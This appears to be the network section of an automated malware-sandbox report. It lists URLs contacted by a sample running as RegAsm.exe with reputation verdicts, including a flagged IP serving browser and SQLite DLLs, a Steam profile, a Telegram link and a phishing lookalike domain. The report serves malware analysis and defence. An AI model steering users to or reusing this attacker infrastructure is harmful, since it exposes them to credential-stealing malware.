https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli | 0% | URL Reputation | safe
https://store.steampowered.com/ | 0% | URL Reputation | safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
https://95.217.240.101KJE | 0% | Avira URL Cloud | safe
https://steamcommunity.com/login | 0% | Avira URL Cloud | safe
https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322 | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK | 0% | Avira URL Cloud | safe
https://95.217.240.101FIE | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67& | 0% | Avira URL Cloud | safe
https://95.217.240.101/softokn3.dll | 100% | Avira URL Cloud | malware
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k& | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/he | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_q | 0% | Avira URL Cloud | safe
https://steamcommunity.com/market/ | 0% | Avira URL Cloud | safe
https://95.217.240.101/msvcp140.dllU | 100% | Avira URL Cloud | malware
https://steamcommunity.com/my/wishlist/ | 0% | Avira URL Cloud | safe
https://95.217.240.101 | 100% | Avira URL Cloud | malware
https://95.217.240.101/freebl3.dlls | 100% | Avira URL Cloud | malware
https://95.217.240.101/msvcp140.dll | 100% | Avira URL Cloud | malware
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis | 0% | Avira URL Cloud | safe
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Avira URL Cloud | safe
https://steamcommunity.co | 100% | Avira URL Cloud | phishing
https://steamcommunity.com/discussions/ | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGA | 0% | Avira URL Cloud | safe
https://t.me/k0mono | 100% | Avira URL Cloud | malware
https://steamcommunity.com/profiles/76561199686524322/badges | 100% | Avira URL Cloud | malware
https://steamcommunity.com/profiles/76561199686524322/inventory/ | 100% | Avira URL Cloud | malware
https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://steamcommunity.com/workshop/ | 0% | Avira URL Cloud | safe
https://95.217.240.101/mozglue.dll | 100% | Avira URL Cloud | malware
https://95.217.240.101/softokn3.dllK | 100% | Avira URL Cloud | malware
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am | 0% | Avira URL Cloud | safe
https://95.217.240.101/sqlx.dll | 100% | Avira URL Cloud | malware
https://steamcommunity.com/profiles/76561199686524322 | 100% | Avira URL Cloud | malware
https://95.217.240.101/v | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.194.234.100 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://95.217.240.101/nss3.dll | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/freebl3.dll | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/softokn3.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/msvcp140.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/mozglue.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/sqlx.dll | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199686524322 | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | JEGHDA.3.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | JEGHDA.3.dr | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/?subsection=broadcasts | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://95.217.240.101/nss3.dll2 | RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&amp | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.dr | false | URL Reputation: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub& | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
http://www.valvesoftware.com/legal.htm | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe | RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | IIDHJD.3.dr | false | URL Reputation: safe | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh& | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l= | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
http://www.mozilla.com/en-US/blocklist/ | RegAsm.exe, RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr | false | URL Reputation: safe | unknown
https://mozilla.org0/ | nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw& | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://95.217.240.101KJE | RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322 | 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
http://store.steampowered.com/privacy_agreement/ | RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67& | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/points/shop/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/login | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | JEGHDA.3.dr | false | Avira URL Cloud: safe | unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.dr | false | URL Reputation: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | JEGHDA.3.dr | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | GCBFBG.3.dr | false | URL Reputation: safe | unknown
https://store.steampowered.com/privacy_agreement/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://95.217.240.101FIE | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k& | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/he | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | GDAAKF.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_q | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/about/ | 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/my/wishlist/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | GCBFBG.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC& | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://95.217.240.101/msvcp140.dllU | RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/freebl3.dlls | RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://help.steampowered.com/en/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/market/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/news/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://95.217.240.101 | 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: malware | unknown
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | JEGHDA.3.dr | false | URL Reputation: safe | unknown
http://store.steampowered.com/subscriber_agreement/ | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v= | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.dr | false | URL Reputation: safe | unknown
https://steamcommunity.co | RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | true | Sophos S4: illegal phishing domain; Avira URL Cloud: phishing | unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGARegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallGDAAKF.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchJEGHDA.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://t.me/k0monofile.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/profiles/76561199686524322/inventory/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/profiles/76561199686524322/badgesRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000003.00000002.2044042072.000000001928D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://95.217.240.101/softokn3.dllKRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
